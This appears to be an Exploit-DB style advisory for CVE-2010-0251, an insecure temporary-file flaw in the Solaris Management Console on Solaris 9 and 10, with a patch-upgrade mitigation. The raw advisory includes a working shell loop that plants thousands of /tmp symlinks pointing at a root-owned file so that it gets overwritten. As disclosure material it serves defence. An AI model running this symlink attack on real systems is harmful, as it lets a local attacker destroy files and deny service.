Insecure Temporary File Creation in Solaris Management Console

vendor:

Solaris

by:

Unknown

5.5

CVSS

MEDIUM

Insecure Temporary File Creation

377

CWE

Product Name: Solaris

Affected Version From: Solaris 9

Affected Version To: Solaris 10

Patch Exists: YES

Related CWE: CVE-2010-0251

CPE: o:oracle:solaris

Metasploit:

Other Scripts:

Platforms Tested:

2010

Insecure Temporary File Creation in Solaris Management Console

The 'Solaris Management Console' subcomponent of Oracle Solaris creates temporary files in an insecure manner. An attacker with local access can exploit this issue to overwrite arbitrary files, leading to denial-of-service conditions or aiding in other attacks.

Mitigation:

Upgrade to a patched version of Oracle Solaris.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41642/info

The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.

An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.

Solaris 9 and 10 are affected.

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF